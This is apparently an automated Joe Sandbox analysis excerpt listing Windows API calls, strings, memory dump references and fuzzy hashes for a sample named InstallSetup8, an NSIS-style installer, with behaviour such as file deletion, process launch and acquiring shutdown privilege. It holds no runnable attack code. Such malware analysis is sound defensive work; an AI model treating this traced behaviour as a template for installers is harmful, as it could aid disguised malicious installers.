CopyFileW.KERNEL32(00442800,00437800,00000001,00441800,00000000), ref: 00403A34

Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNEL32(00009292,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270,00009292,?,00441800,00405C83,?,00009292,00441800), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?,?,?,?,?,?,?,?,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002,00000004,?,?,?,?,?,?,?,?), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNEL32(?,00000000,00403525,00441800,00441800,00441800,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

~nsu%X.tmp, xrefs: 004039A8
TMP, xrefs: 00403862
NSIS Error, xrefs: 00403695
TEMP, xrefs: 0040385A
Low, xrefs: 00403848
UXTHEME, xrefs: 00403620, 00403625, 0040362B
SeShutdownPrivilege, xrefs: 00403AD8
Error launching installer, xrefs: 004038FD
\Temp, xrefs: 0040382C

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-2779336553
Opcode ID: 32ccfccbee9d2f95e380080254fd3e205a9f5d358a382af22345ff9c53e9cdef
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: 32ccfccbee9d2f95e380080254fd3e205a9f5d358a382af22345ff9c53e9cdef
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405779
GetDlgItem.USER32(?,000003EE), ref: 00405788
GetClientRect.USER32(?,?,00000004), ref: 004057C5
GetSystemMetrics.USER32(00000002), ref: 004057CC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
ShowWindow.USER32(?,00000008), ref: 00405868
GetDlgItem.USER32(?,000003EC,?,0000001B,000000FF), ref: 00405889
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
GetDlgItem.USER32(?,000003F8), ref: 00405797

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

GetDlgItem.USER32(?,000003EC,00000000,?), ref: 004058DB
CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
CloseHandle.KERNEL32(00000000), ref: 004058F0
ShowWindow.USER32(00000000), ref: 00405914
ShowWindow.USER32(?,00000008), ref: 00405919
ShowWindow.USER32(00000008), ref: 00405963
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
CreatePopupMenu.USER32 ref: 004059A8
AppendMenuW.USER32(00000000,00000000,00000001,00000000,00000000,000000E1), ref: 004059BC
GetWindowRect.USER32(?,?), ref: 004059DC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
OpenClipboard.USER32(00000000), ref: 00405A3D
EmptyClipboard.USER32 ref: 00405A43
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
GlobalLock.KERNEL32(00000000), ref: 00405A59
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
CloseClipboard.USER32 ref: 00405A9E

Strings

{, xrefs: 00405981

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004049C7 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A16
SetWindowTextW.USER32(00000000,?,?), ref: 00404A40
SHBrowseForFolderW.SHELL32(?,0042B240,?), ref: 00404AF1
CoTaskMemFree.OLE32(00000000), ref: 00404AFC
lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
SetDlgItemTextW.USER32(?,000003FB,?,?), ref: 00404B4C

Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83,000003FB,?), ref: 00405BAE

Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
Part of subcall function 00406805: CharNextW.USER32(?,0043F000,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
Part of subcall function 00406805: CharPrevW.USER32(?,?,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A

Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
Part of subcall function 00404D83: wsprintfW.USER32(00000000,0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E2D
Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

A, xrefs: 00404AEA

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405C63 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00009292,00441800,0043F000), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,00009292,00441800,0043F000), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,00009292,00441800,0043F000), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,00009292,00441800,0043F000), ref: 00405CFD
FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,00009292,00441800,0043F000), ref: 00405D0D
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

\*.*, xrefs: 00405CCE
pB, xrefs: 00405CBC

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*$pB
API String ID: 2035342205-1006940126
Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 004068B4 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00009292,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270,00009292,?,00441800,00405C83,?,00009292,00441800), ref: 004068BF
FindClose.KERNEL32(00000000), ref: 004068CB

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

Uniqueness

Uniqueness Score: -1.00%

Function 004021AF Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
Opcode Fuzzy Hash: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
Opcode Fuzzy Hash: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F5B
GetDlgItem.USER32(?,00000408), ref: 00404F66
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
DeleteObject.GDI32(00000000), ref: 0040503D
SendMessageW.USER32(?,00000143,00000000,00000000,00000000,?), ref: 00405068
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
SendMessageW.USER32(?,00001132,00000000,?,?,00000016,?,?,00000015,?), ref: 0040510F
SendMessageW.USER32(?,0000110A,00000003,00000110,?,00000016,?,?,00000015,?), ref: 0040513F

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

SendMessageW.USER32(?,00001132,00000000,?,?,00000016,?,?,00000015,?), ref: 00405153
GetWindowLongW.USER32(?,000000F0,?,00000016,?,?,00000015,?), ref: 00405181
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
ShowWindow.USER32(?,00000005), ref: 0040519F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
SendMessageW.USER32(?,00000420,00000000,00000020,00000020), ref: 00405338
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
ImageList_Destroy.COMCTL32(?), ref: 0040536D
GlobalFree.KERNEL32(?), ref: 0040537D
SendMessageW.USER32(?,0000014E,00000000,00000000,00000000), ref: 004053F6
SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
ShowWindow.USER32(?,00000000), ref: 00405527
GetDlgItem.USER32(?,000003FE,00000000), ref: 00405532
ShowWindow.USER32(00000000), ref: 00405539

Strings

, xrefs: 00405511
M, xrefs: 004050F7
N, xrefs: 004051D8

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
ShowWindow.USER32(?), ref: 00404033
GetWindowLongW.USER32(?,000000F0), ref: 00404045
ShowWindow.USER32(?,00000004), ref: 0040405E
DestroyWindow.USER32 ref: 00404072
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
GetDlgItem.USER32(?,?), ref: 004040AA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
IsWindowEnabled.USER32(00000000), ref: 004040C5
GetDlgItem.USER32(?,00000001), ref: 00404170
GetDlgItem.USER32(?,00000002), ref: 0040417A
SetClassLongW.USER32(?,000000F2,?,0000001C,000000FF), ref: 00404194
SendMessageW.USER32(0000040F,00000000,00000001,?,00000000), ref: 004041E5
GetDlgItem.USER32(?,00000003,?,FFFFFC1A,?,?,FFFFFC1B,?,?,FFFFFC19,?,00444000,?,0000040B), ref: 0040428B
ShowWindow.USER32(00000000,?), ref: 004042AC
EnableWindow.USER32(?,?), ref: 004042BE
EnableWindow.USER32(?,?), ref: 004042D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
EnableMenuItem.USER32(00000000), ref: 004042F6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
SetWindowTextW.USER32(?,0042CA68,00000000,0042CA68,?,0042CA68,00000000), ref: 0040435F
ShowWindow.USER32(?,0000000A), ref: 00404493

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C29 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00406978

lstrcatW.KERNEL32(00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,00009292,00441800,00000000,0043F000,00008001), ref: 00403CAA
lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,00009292), ref: 00403D2A
lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,00009292), ref: 00403D91

Part of subcall function 0040649E: wsprintfW.USER32(0042BA48,00408418,?,00406786,004326A0,00000000,0042BA48,?,?,00000000,00000000,?,000091FE), ref: 004064AB

RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0,RichEd20), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

RichEdit, xrefs: 00403E84
RichEdit20W, xrefs: 00403E75, 00403E7B
_Nb, xrefs: 00403DAD, 00403E15
RichEd20, xrefs: 00403E57
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
.exe, xrefs: 00403D37
.DEFAULT\Control Panel\International, xrefs: 00403C95
RichEd32, xrefs: 00403E65

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1115850852
Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00404695 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001,?,00000023,?,?,00000022,?), ref: 00404733
GetDlgItem.USER32(?,000003E8,?), ref: 00404747
SendMessageW.USER32(00000000,0000045B,00000001,00000000,00000000), ref: 00404764
GetSysColor.USER32(?), ref: 00404775
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
lstrlenW.KERNEL32(?), ref: 00404796
SendMessageW.USER32(00000000,00000435,00000000,00000000,?), ref: 004047A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
GetDlgItem.USER32(?,0000040A,000000F0,00000000,00000000), ref: 00404811
SendMessageW.USER32(00000000), ref: 00404818
GetDlgItem.USER32(?,000003E8), ref: 00404843
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
LoadCursorW.USER32(00000000,00007F02), ref: 00404894
SetCursor.USER32(00000000), ref: 00404897
LoadCursorW.USER32(00000000,00007F00,0000070B,004326A0,00000001), ref: 004048B0
SetCursor.USER32(00000000), ref: 004048B3
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4

Strings

N, xrefs: 00404831

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
